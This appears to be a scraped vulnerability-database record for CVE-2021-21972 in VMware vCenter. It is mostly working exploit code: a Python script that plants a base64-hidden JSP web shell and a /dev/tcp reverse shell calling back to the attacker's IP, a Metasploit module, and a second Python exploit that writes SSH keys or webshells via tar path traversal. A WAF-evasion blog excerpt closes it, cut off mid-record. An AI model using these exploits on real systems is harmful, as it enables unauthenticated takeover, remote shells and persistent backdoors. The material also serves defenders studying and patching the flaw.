https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md\n\n#!/usr/bin/python2\n\nimport os\nimport urllib3\nimport argparse\nimport sys\nimport requests\nimport base64\nimport tarfile\nimport threading\nimport time\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nmyargs=argparse.ArgumentParser()\nmyargs.add_argument('-T','--target',help='The IP address of the target',required=True)\nmyargs.add_argument('-L','--local',help='Your local IP',required=True)\nargs=myargs.parse_args()\n\ndef getprompt(x):\n\tprint (\"(CHackA0101-GNU/Linux)$ \"+ str(x)) \n\ndef getpath(path=\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp\"):\n fullpath=\"../\" * 7 + path\n return fullpath.replace('\\\\','/').replace('//','/')\n\ndef createbackdoor(localip):\n # shell4.jsp\n backdoor = \"PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==\"\n backdoor = base64.b64decode(backdoor).decode('utf-8')\n f = open(\"shell4.jsp\",\"w\")\n f.write(backdoor)\n f.close()\n # reverse.sh \n # After decoding overwrite string 'CUSTOM_IP' for local IP \n shell=\"IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=\"\n shell=base64.b64decode(shell).decode('utf-8')\n shell=shell.replace('CUSTOM_IP',localip)\n f=open(\"reverse.sh\",\"w\")\n f.write(shell)\n f.close()\n # Move on with the payload\n payload_file=tarfile.open('payload.tar','w')\n myroute=getpath()\n getprompt('Adding web backdoor to archive')\n payload_file.add(\"shell4.jsp\", myroute)\n myroute=getpath(\"tmp/reverse.sh\")\n getprompt('Adding bash backdoor to archive')\n payload_file.add(\"reverse.sh\", myroute)\n payload_file.close()\n # cleaning up a little bit\n os.unlink(\"reverse.sh\")\n os.unlink(\"shell4.jsp\")\n getprompt('Backdoor file just was created.')\n\ndef launchexploit(ip):\n res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60)\n if res.status_code == 200 and res.text == 'SUCCESS':\n getprompt('Backdoor was uploaded successfully!')\n return True\n else:\n getprompt('Backdoor failed to be uploaded. Target denied access.')\n return False\n\ndef testshell(ip):\n getprompt('Looking for shell...')\n shell_path=\"/ui/resources/shell4.jsp?cmd=uname+-a\"\n res=requests.get('https://' + ip + shell_path, verify=False, timeout=60)\n if res.status_code==200:\n getprompt('Shell was found!.')\n response=res.text\n if True:\n getprompt('Shell is responsive.')\n try:\n response=re.findall(\"b>(.+)</\",response)[0]\n print('$>uname -a')\n print(response)\n except:\n pass\n return True\n else:\n getprompt('Sorry. Shell was not found.')\n return False\n\ndef opendoor(url):\n time.sleep(3)\n getprompt('Executing command.')\n requests.get(url, verify=False, timeout=1800)\n\t\ndef executebackdoor(ip, localip):\n url=\"https://\"+ip+\"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh\"\n t=threading.Thread(target=opendoor,args=(url,))\n t.start()\n getprompt('Setting up socket '+localip+':443')\n os.system('nc -lnvp 443')\n\nif len(sys.argv)== 1:\n myargs.print_help(sys.stderr)\n sys.exit(1)\ncreatebackdoor(args.local)\nuploaded=launchexploit(args.target)\nif uploaded:\n tested=testshell(args.target)\n if tested:\n executebackdoor(args.target, args.local)\ngetprompt(\"Execution completed!\")\n", "sourceHref": "https://0day.today/exploit/36472", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-25T15:35:44", "description": "This Metasploit module exploits an unauthenticated OVA file upload and path traversal in VMware vCenter Server to write a JSP payload to a web-accessible directory. Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c. Note that later vulnerable versions of the Linux appliance aren't exploitable via the webshell technique. Furthermore, writing an SSH public key to /home/vsphere-ui/.ssh/authorized_keys works, but the user's non-existent password expires 90 days after install, rendering the technique nearly useless against production environments. You'll have the best luck targeting older versions of the Linux appliance. The Windows target should work ubiquitously.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T00:00:00", "type": "zdt", "title": "VMware vCenter Server File Upload / Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-08T00:00:00", "id": "1337DAY-ID-35912", "href": "https://0day.today/exploit/description/35912", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n # \"Shotgun\" approach to writing JSP\n Rank = ManualRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Unauthenticated OVA File Upload RCE',\n 'Description' => %q{\n This module exploits an unauthenticated OVA file upload and path\n traversal in VMware vCenter Server to write a JSP payload to a\n web-accessible directory.\n\n Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c.\n Note that later vulnerable versions of the Linux appliance aren't\n exploitable via the webshell technique. Furthermore, writing an SSH\n public key to /home/vsphere-ui/.ssh/authorized_keys works, but the\n user's non-existent password expires 90 days after install, rendering\n the technique nearly useless against production environments.\n\n You'll have the best luck targeting older versions of the Linux\n appliance. The Windows target should work ubiquitously.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu', # Analysis and exploit\n 'mr_me', # Co-conspirator\n 'Viss' # Co-conspirator\n ],\n 'References' => [\n ['CVE', '2021-21972'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'],\n ['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'],\n ['URL', 'https://twitter.com/jas502n/status/1364810720261496843'],\n ['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'],\n ['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'],\n ['URL', 'https://kb.vmware.com/s/article/2143838'],\n ['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html']\n ],\n 'DisclosureDate' => '2021-02-23', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'win'],\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true on Windows\n 'Targets' => [\n [\n # TODO: /home/vsphere-ui/.ssh/authorized_keys\n 'VMware vCenter Server <= 6.7 Update 1b (Linux)',\n {\n 'Platform' => 'linux'\n }\n ],\n [\n 'VMware vCenter Server <= 6.7 Update 3j (Windows)',\n {\n 'Platform' => 'win'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp',\n 'CheckModule' => 'auxiliary/scanner/vmware/esx_fingerprint'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],\n 'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint']\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n # /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index>\n OptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me\n OptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu\n ])\n end\n\n def spray_and_pray_min\n datastore['SprayAndPrayMin']\n end\n\n def spray_and_pray_max\n datastore['SprayAndPrayMax']\n end\n\n def spray_and_pray_range\n (spray_and_pray_min..spray_and_pray_max).to_a\n end\n\n def check\n # Run auxiliary/scanner/vmware/esx_fingerprint\n super\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n case res.code\n when 200\n # {\"States\":\"[]\",\"Install Progress\":\"UNKNOWN\",\"Config Progress\":\"UNKNOWN\",\"Config Final Progress\":\"UNKNOWN\",\"Install Final Progress\":\"UNKNOWN\"}\n expected_keys = [\n 'States',\n 'Install Progress',\n 'Install Final Progress',\n 'Config Progress',\n 'Config Final Progress'\n ]\n\n if (expected_keys & res.get_json_document.keys) == expected_keys\n return CheckCode::Vulnerable('Unauthenticated endpoint access granted.')\n end\n\n CheckCode::Detected('Target did not respond with expected keys.')\n when 401\n CheckCode::Safe('Unauthenticated endpoint access denied.')\n else\n CheckCode::Detected(\"Target responded with code #{res.code}.\")\n end\n end\n\n def exploit\n upload_ova\n pop_thy_shell # ;)\n end\n\n def upload_ova\n print_status(\"Uploading OVA file: #{ova_filename}\")\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n generate_ova,\n 'application/x-tar', # OVA is tar\n 'binary',\n %(form-data; name=\"uploadFile\"; filename=\"#{ova_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/uploadova'),\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res && res.code == 200 && res.body == 'SUCCESS'\n fail_with(Failure::NotVulnerable, 'Failed to upload OVA file')\n end\n\n register_files_for_cleanup(*jsp_paths)\n\n print_good('Successfully uploaded OVA file')\n end\n\n def pop_thy_shell\n jsp_uri =\n case target['Platform']\n when 'linux'\n normalize_uri(target_uri.path, \"/ui/resources/#{jsp_filename}\")\n when 'win'\n normalize_uri(target_uri.path, \"/statsreport/#{jsp_filename}\")\n end\n\n print_status(\"Requesting JSP payload: #{full_uri(jsp_uri)}\")\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri\n )\n\n unless res && res.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to request JSP payload')\n end\n\n print_good('Successfully requested JSP payload')\n end\n\n def generate_ova\n ova_file = StringIO.new\n\n # HACK: Spray JSP in the OVA and pray we get a shell...\n Rex::Tar::Writer.new(ova_file) do |tar|\n jsp_paths.each do |path|\n # /tmp/unicorn_ova_dir/../../<path>\n tar.add_file(\"../..#{path}\", 0o644) { |jsp| jsp.write(payload.encoded) }\n end\n end\n\n ova_file.string\n end\n\n def jsp_paths\n case target['Platform']\n when 'linux'\n @jsp_paths ||= spray_and_pray_range.shuffle.map do |idx|\n \"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/#{idx}/0/h5ngc.war/resources/#{jsp_filename}\"\n end\n when 'win'\n # Forward slashes work here\n [\"/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/#{jsp_filename}\"]\n end\n end\n\n def ova_filename\n @ova_filename ||= \"#{rand_text_alphanumeric(8..42)}.ova\"\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..42)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35912", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T22:25:43", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-01T00:00:00", "type": "zdt", "title": "VMware vCenter Server 7.0 - Unauthenticated File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "1337DAY-ID-35879", "href": "https://0day.today/exploit/description/35879", "sourceData": "# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html\r\n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)\r\n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds\r\n# CVE: CVE-2021-21972\r\n\r\n#!/usr/bin/env python3\r\n'''\r\n Copyright 2021 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2021-21972.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n CVE-2021-21972 is an unauthenticated file upload and overwrite,\r\n exploitation can be done via SSH public key upload or a webshell\r\n The webshell must be of type JSP, and its success depends heavily on the specific vCenter version\r\n \r\n # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister\r\n # A white page means vulnerable\r\n # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)\r\n # Notes:\r\n # * On Linux SSH key upload is always best, when SSH access is possible & enabled\r\n # * On Linux the upload is done as user vsphere-ui:users\r\n # * On Windows the upload is done as system user\r\n # * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\"\r\n # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n \r\n Features: vulnerability checker + exploit\r\n'''\r\n\r\nimport os, tarfile, sys, optparse, requests\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nlProxy = {}\r\nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n <env:Body>\r\n <RetrieveServiceContent xmlns=\"urn:vim25\">\r\n <_this type=\"ServiceInstance\">ServiceInstance</_this>\r\n </RetrieveServiceContent>\r\n </env:Body>\r\n </env:Envelope>'''\r\nsURL = sFile = sRpath = sType = None\r\n\r\ndef parseArguments(options):\r\n global sURL, sFile, sType, sRpath, lProxy\r\n if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.')\r\n sURL = options.url\r\n if sURL[-1:] == '/': sURL = sURL[:-1]\r\n if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL\r\n sFile = options.file\r\n if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)\r\n sType = 'ssh'\r\n if options.type: sType = options.type\r\n if options.rpath: sRpath = options.rpath\r\n else: sRpath = None\r\n if options.proxy: lProxy = {'https': options.proxy}\r\n\r\ndef getVersion(sURL):\r\n def getValue(sResponse, sTag = 'vendor'):\r\n try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]\r\n except: pass\r\n return ''\r\n oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)\r\n #print(oResponse.text)\r\n if oResponse.status_code == 200:\r\n sResult = oResponse.text\r\n if not 'VMware' in getValue(sResult, 'vendor'):\r\n exit('[-] Not a VMware system: ' + sURL)\r\n else:\r\n sName = getValue(sResult, 'name')\r\n sVersion = getValue(sResult, 'version') # e.g. 7.0.0\r\n sBuild = getValue(sResult, 'build') # e.g. 15934073\r\n sFull = getValue(sResult, 'fullName')\r\n print('[+] Identified: ' + sFull)\r\n return sVersion, sBuild\r\n exit('[-] Not a VMware system: ' + sURL)\r\n\r\ndef verify(sURL):\r\n #return True\r\n sURL += '/ui/vropspluginui/rest/services/uploadova'\r\n try:\r\n oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)\r\n except:\r\n exit('[-] System not available: ' + sURL)\r\n if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely\r\n else: return False\r\n\r\ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):\r\n def getResourcePath():\r\n oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)\r\n return oResponse.text.split('static/')[1].split('/')[0]\r\n oTar = tarfile.open('payloadLin.tar','w')\r\n if sRpath: ## version & build not important\r\n if sRpath[0] == '/': sRpath = sRpath[1:]\r\n sPayloadPath = '../../' + sRpath\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'absolute'\r\n elif sType.lower() == 'ssh': ## version & build not important\r\n sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'ssh'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):\r\n ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)\r\n oTar.close()\r\n return 'webshell'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):\r\n ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):\r\n ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n \r\n\r\ndef createTarWin(sFile, sRpath = None):\r\n ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows\r\n if sRpath:\r\n if sRpath[0] == '/': sRpath = sRpath[:1]\r\n sPayloadPath = '../../' + sRpath\r\n else:\r\n sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)\r\n oTar = tarfile.open('payloadWin.tar','w')\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n\r\ndef uploadFile(sURL, sUploadType, sFile):\r\n #print('[!] Uploading ' + sFile)\r\n sFile = os.path.basename(sFile)\r\n sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova'\r\n arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}\r\n ## Linux\r\n oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Linux payload uploaded succesfully.')\r\n if sUploadType == 'ssh':\r\n print('[+] SSH key installed for user \\'vsphere-ui\\'.')\r\n print(' Please run \\'ssh [email\u00a0protected]' + sURL.replace('https://','') + '\\'')\r\n return True\r\n elif sUploadType == 'webshell':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n #print('testing ' + sWebshell)\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n elif sUploadType == 'backdoor':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n print('[+] Backdoor ready, please reboot or wait for a reboot')\r\n print(' then open: ' + sWebshell)\r\n else: ## absolute\r\n pass\r\n ## Windows\r\n arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}\r\n oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Windows payload uploaded succesfully.')\r\n if sUploadType == 'backdoor':\r\n print('[+] Absolute upload looks OK')\r\n return True\r\n else:\r\n sWebshell = sURL + '/statsreport/' + sFile\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n usage = (\r\n 'Usage: %prog [option]\\n'\r\n 'Exploiting Windows & Linux vCenter Server\\n'\r\n 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n'\r\n 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n'\r\n 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway')\r\n\r\n parser = optparse.OptionParser(usage=usage)\r\n parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1')\r\n parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell')\r\n parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh')\r\n parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile')\r\n parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080')\r\n \r\n (options, args) = parser.parse_args()\r\n \r\n parseArguments(options)\r\n \r\n ## Verify\r\n if verify(sURL): print('[+] Target vulnerable: ' + sURL)\r\n else: exit('[-] Target not vulnerable: ' + sURL)\r\n \r\n ## Read out the version\r\n sVersion, sBuild = getVersion(sURL)\r\n if sRpath: print('[!] Ready to upload your file to ' + sRpath)\r\n elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'')\r\n else: print('[!] Ready to upload webshell \\'' + sFile + '\\'')\r\n sAns = input('[?] Want to exploit? [y/N]: ')\r\n if not sAns or not sAns[0].lower() == 'y': exit()\r\n \r\n ## Create TAR file\r\n sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath)\r\n if not sUploadType == 'ssh': createTarWin(sFile, sRpath)\r\n\r\n ## Upload and verify\r\n uploadFile(sURL, sUploadType, sFile)\r\n \r\n ## Cleanup\r\n os.remove('payloadLin.tar')\r\n os.remove('payloadWin.tar')\n\n# 0day.today [2021-09-10] #", "sourceHref": "https://0day.today/exploit/35879", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "wallarmlab": [{"lastseen": "2021-08-19T16:35:42", "description": "The recent critical security issue in VMware vCenter was discovered this January and fixed on February 23rd <https://www.vmware.com/security/advisories/VMSA-2021-0002.html>. The exploit looks like a simple JSP shell upload, but for some reason, it's a blind spot for Web Application Firewalls (WAFs). Let's understand why. \n\nThe CVE-2021-21972 affects vCenter versions 6.5, 6.7, and 7.0. The exploit for Metasploit released <https://vulners.com/packetstorm/PACKETSTORM:161695> today.\n\nThe exploit description is pretty straight forward "This module exploits an unauthenticated OVA file upload and path traversal in VMware vCenter Server to write a JSP payload to a web-accessible directory. ". It should be something like a classic web shell file upload issue from the 90th. \n\nThis issue's root cause is behind an unauthenticated OVA upload endpoint on the "/ui/vropspluginui/rest/services/uploadova" URL. But the neat thing is that the payload itself is delivered inside the TAR file package and uses path traversal trick inside. \n\nThis part of the exploit source code explains it: \n \n \n # HACK: Spray JSP in the OVA and pray we get a shell... \n Rex::Tar::Writer.new(ova_file) do |tar| \n jsp_paths.each do |path| \n # /tmp/unicorn_ova_dir/../../<path> \n tar.add_file(\"../..#{path}\", 0o644) { |jsp| jsp.write(payload.encoded) } \n end \n end \n\nAs we can see, a JSP file with a web shell inside added to the TAR achieve with the path traversal attack vector in a file path. As a result, VMware vCenter software extracts the JSP web shell from the TAR file to the webserver's "resources" or "statsreport" folder. Once uploaded, the web shell is available by a direct HTTP request.\n\nSo, what happens with WAFs in this case? An answer is simple, and it's encoding. Since malicious payloads like web shell JSP body and path traversal attack in a filename encoded by TAR file format, WAF can't see it. For web application firewalls, it's just binary data that goes to the webserver and nothing more. To catch such cases, WAFs should be able to decode TAR files on a flight, unpack them, check for malicious payloads, and only after that sends to a protected webserver or API gateway. \n\nUnfortunately, not all the WAFs support TAR encodings, as well as JSON, GZIP, XML, and a bunch of more usual web data formats. \n\nTo mitigate this issue, we recommend applying a virtual patch for the "/ui/vropspluginui/rest/services/uploadova" endpoint.\n\nStay secure!\n\nThe post [Why WAFs can't catch VMware CVE-2021-21972 Remote Code Execution Exploit?](<https://lab.wallarm.com/why-wafs-cant-catch-vmware-cve-2021-21972-remote-code-execution-exploit/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T20:22:27", "type": "wallarmlab", "title": "Why WAFs can\u2019t catch VMware CVE-2021-21972 Remote Code Execution Exploit?", "bulletinFamily": "blog", "cvss2": {"severity": 